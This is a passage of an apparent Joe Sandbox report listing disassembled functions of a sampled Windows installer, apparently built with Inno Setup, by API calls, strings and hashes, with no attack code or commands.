                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: NtdllProc_Window
                                                                                            • String ID:
                                                                                            • API String ID: 4255912815-0
                                                                                            • Opcode ID: 98c4159c357ba624018b5095eca27885fab0bd25fe2865ee120464a1d56055ca
                                                                                            • Instruction ID: 23eb90ac0865fb6649058132ab0dcd5e2738ee5152c03834e0ad15106694cca9
                                                                                            • Opcode Fuzzy Hash: 98c4159c357ba624018b5095eca27885fab0bd25fe2865ee120464a1d56055ca
                                                                                            • Instruction Fuzzy Hash: B4412775608505EFCB10CF9DC6808AABBF5FB48320BB5C996E848DB719D338EE419B54
                                                                                            APIs
                                                                                            • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045C967
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CryptFour
                                                                                            • String ID:
                                                                                            • API String ID: 2153018856-0
                                                                                            • Opcode ID: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
                                                                                            • Instruction ID: 196b54fe7aa8ab1053afe2cffafcf6ed6da51dc24599f2bb869cb02721a3a021
                                                                                            • Opcode Fuzzy Hash: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
                                                                                            • Instruction Fuzzy Hash: 7EC09BF240420CBF65005795FCC9C77F75CE65C6647408126F60442101D671AC1045B4
                                                                                            APIs
                                                                                            • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046CB48,?,0046CD29), ref: 0045C97A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CryptFour
                                                                                            • String ID:
                                                                                            • API String ID: 2153018856-0
                                                                                            • Opcode ID: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
                                                                                            • Instruction ID: f930510039fdc8c4d2d2d599ed284be9893e60875d5d975e013ee6f81a6adef0
                                                                                            • Opcode Fuzzy Hash: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
                                                                                            • Instruction Fuzzy Hash: E8A002B0E80300BAFD3057706E0EF37252CD7D4F01F208465B211A91D4C6A46404857C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3292268677.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3292239708.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000001.00000002.3292297238.0000000010002000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_10000000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                            • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                            • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                            • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3292268677.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3292239708.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000001.00000002.3292297238.0000000010002000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_10000000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                            • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                            • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                            • Instruction Fuzzy Hash:
                                                                                            APIs
                                                                                            • CreateMutexA.KERNEL32(00498AE4,00000001,00000000,00000000,00457875,?,?,?,00000001,?,00457A8F,00000000,00457AA5,?,00000000,0049A628), ref: 0045758D
                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00498AE4,00000004,00000000,00002018,00000000), ref: 004575C5
                                                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045784B,?,00498AE4,00000001,00000000,00000000,00457875,?,?,?), ref: 004575EC
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004576F9
                                                                                            • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045784B,?,00498AE4,00000001,00000000,00000000,00457875), ref: 00457651
                                                                                              • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                            • CloseHandle.KERNEL32(00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457710
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457749
                                                                                            • GetLastError.KERNEL32(00000000,000000FF,00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045775B
                                                                                            • UnmapViewOfFile.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045782D
                                                                                            • CloseHandle.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045783C
                                                                                            • CloseHandle.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457845
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
                                                                                            • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
                                                                                            • API String ID: 4012871263-351310198
                                                                                            • Opcode ID: b8857b922522f3f755a45729126c2f0d9cd80f0de934d6ab31d5c47b9e38ba38
                                                                                            • Instruction ID: 9fa33364040fb067cffbf7544db289955a363cad08101e599f84dfab4c508334
                                                                                            • Opcode Fuzzy Hash: b8857b922522f3f755a45729126c2f0d9cd80f0de934d6ab31d5c47b9e38ba38
                                                                                            • Instruction Fuzzy Hash: D7916370A042059FDB10EBA9D845B9EB7B5EB08305F10857BE814EB383DB789948CF69
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                                            • SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                                            • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                                            • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                                            • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                                            • FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                            • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                            • API String ID: 2323315520-3614243559
                                                                                            • Opcode ID: 51cb45610875762faf6d6cb9dc15dbb0f4a8b87cdd32b8fce74619213e256557
                                                                                            • Instruction ID: cf5be9d6f1a649145535b6a7131e14805afeac8bde6fe10f2a473d18be96f611
                                                                                            • Opcode Fuzzy Hash: 51cb45610875762faf6d6cb9dc15dbb0f4a8b87cdd32b8fce74619213e256557
                                                                                            • Instruction Fuzzy Hash: D63110B1640700EBDF00EBF9AC86A653294F729724745093FB648DB192DB7E485ECB1D
                                                                                            APIs
                                                                                            • 73A0A570.USER32(00000000,?,0041A954,?), ref: 0041CA50
                                                                                            • 73A14C40.GDI32(?,00000000,?,0041A954,?), ref: 0041CA5C
                                                                                            • 73A16180.GDI32(0041A954,?,00000001,00000001,00000000,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA80
                                                                                            • 73A14C00.GDI32(?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA90
                                                                                            • SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
                                                                                            • FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
                                                                                            • SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
                                                                                            • SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
                                                                                            • PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
                                                                                            • 73A14C40.GDI32(?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954), ref: 0041CB3B
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
                                                                                            • 73A08830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954), ref: 0041CB84
                                                                                            • 73A022A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?), ref: 0041CB8D
                                                                                            • 73A08830.GDI32(0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CB9C
                                                                                            • 73A022A0.GDI32(0041CE4C,0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CBA5
                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
                                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
                                                                                            • 73A14D40.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC1A,?,?,00000000), ref: 0041CBF1
                                                                                            • SelectObject.GDI32(00000000,?), ref: 0041CBFE
                                                                                            • DeleteDC.GDI32(00000000), ref: 0041CC14
                                                                                              • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$ObjectSelect$A022A08830Text$A16180A570DeleteFillRect
                                                                                            • String ID:
                                                                                            • API String ID: 2377543522-0
                                                                                            • Opcode ID: aa3120a436c449d3c69836d856a65b18742abf0f47e61156e5e14d2e6b4a0b24
                                                                                            • Instruction ID: 69ed6b4e4825e3c47d53d1ee88e95f0281db4649dcd7e45998b3becab3701dfd
                                                                                            • Opcode Fuzzy Hash: aa3120a436c449d3c69836d856a65b18742abf0f47e61156e5e14d2e6b4a0b24
                                                                                            • Instruction Fuzzy Hash: 6261EC71A44609AFDF10EBE9DC86F9FB7B8EF48704F14446AB504E7281D67CA9408B68
                                                                                            APIs
                                                                                            • ShowWindow.USER32(?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000,?,00496FE3,00000000,00496FED,?,00000000), ref: 00496917
                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000,?,00496FE3,00000000), ref: 0049692A
                                                                                            • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000), ref: 0049693A
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0049695B
                                                                                            • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000), ref: 0049696B
                                                                                              • Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,0045559A,00000000,00455602), ref: 0042D44D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                            • String ID: $pI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$oI$oI
                                                                                            • API String ID: 2000705611-3392794427
                                                                                            • Opcode ID: a02d3fed669f7fb7c340bf5c1bb211ceb87890bb9eb81734911f04de300cbb5a
                                                                                            • Instruction ID: 31cdb79ee62171b288e36ce2cb74f04ee829b5848567b5503989d80848a91494
                                                                                            • Opcode Fuzzy Hash: a02d3fed669f7fb7c340bf5c1bb211ceb87890bb9eb81734911f04de300cbb5a
                                                                                            • Instruction Fuzzy Hash: 1191D530A04255AFDF11EBA5C852BAF7FA4EB49304F528477F500AB2C2D67DAC05CB69
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,0045A0B4,?,?,?,?,?,00000006,?,00000000,00495CC7,?,00000000,00495D6A), ref: 00459F66
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                            • API String ID: 1452528299-3112430753
                                                                                            • Opcode ID: b40920f120a9bf38da6ee553801966ffb6b78c7b5657bb9011c081c98828634e
                                                                                            • Instruction ID: 69f6fbefbe6f055fc938da3b3950c8fb4cadcfc16d4dd4dc981ad9326b9f7ff7
                                                                                            • Opcode Fuzzy Hash: b40920f120a9bf38da6ee553801966ffb6b78c7b5657bb9011c081c98828634e
                                                                                            • Instruction Fuzzy Hash: 5D71B130B102049BCB00EF6998827AE77A5AF49716F50856BFC05DB383DB7C9E4D875A
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32 ref: 0045C2FA
                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045C31A
                                                                                            • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045C327
                                                                                            • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045C334
                                                                                            • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045C342
                                                                                              • Part of subcall function 0045C1E8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045C287,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045C261
                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C535,?,?,00000000), ref: 0045C3FB
                                                                                            • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C535,?,?,00000000), ref: 0045C404
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                            • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                            • API String ID: 59345061-4263478283
                                                                                            • Opcode ID: 4113bb8dbcd17bfcbcc3a54e2f337fa89a8317241d30fe9918db60e1e55ed00a
                                                                                            • Instruction ID: 8ce8c74b38915e38562a90fe4681b9431f62f8b5bebe6c1e41ffef27034fd0c0
                                                                                            • Opcode Fuzzy Hash: 4113bb8dbcd17bfcbcc3a54e2f337fa89a8317241d30fe9918db60e1e55ed00a
                                                                                            • Instruction Fuzzy Hash: DF5163B1900708EFDB10DFD9C881BAEB7B8EB4D711F14806AF905B7241D678A945CFA9
                                                                                            APIs
                                                                                            • 73A14C40.GDI32(00000000,?,00000000,?), ref: 0041B3D3
                                                                                            • 73A14C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3DD
                                                                                            • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
                                                                                            • 73A16180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B406
                                                                                            • 73A0A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B412
                                                                                            • 73A14C00.GDI32(00000000,0000000B,?,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B43F
                                                                                            • 73A0A480.USER32(00000000,00000000,0041B472,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B465
                                                                                            • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                                            • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                                            • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                                            • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$Select$Delete$A16180A480A570Stretch
                                                                                            • String ID:
                                                                                            • API String ID: 3135053572-0
                                                                                            • Opcode ID: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                                            • Instruction ID: 9e854467c286a28b18f31183f63f6c048648830cb6dea2264be82148a8da808a
                                                                                            • Opcode Fuzzy Hash: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                                            • Instruction Fuzzy Hash: DC419D71E40619AFDF10EAE9D846FAFB7B8EF08704F104466B614FB281D67969408BA4
                                                                                            APIs
                                                                                              • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00471CA0
                                                                                            • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00471D9F
                                                                                            • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00471DB5
                                                                                            • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00471DDA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                            • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                            • API String ID: 971782779-3668018701
                                                                                            • Opcode ID: 0d3410c3bdf89c1015e05b6172e76740a58f53e74cadef7db015f49446f40693
                                                                                            • Instruction ID: db08b3a78c5346aa08fc53deac37c7c900aaeab2e7ee66e1d047288e3336f214
                                                                                            • Opcode Fuzzy Hash: 0d3410c3bdf89c1015e05b6172e76740a58f53e74cadef7db015f49446f40693
                                                                                            • Instruction Fuzzy Hash: 55D11374A00149AFDB11EFA9D882BDDB7F5AF48304F50806AF804B7391D778AE45CB69
                                                                                            APIs
                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
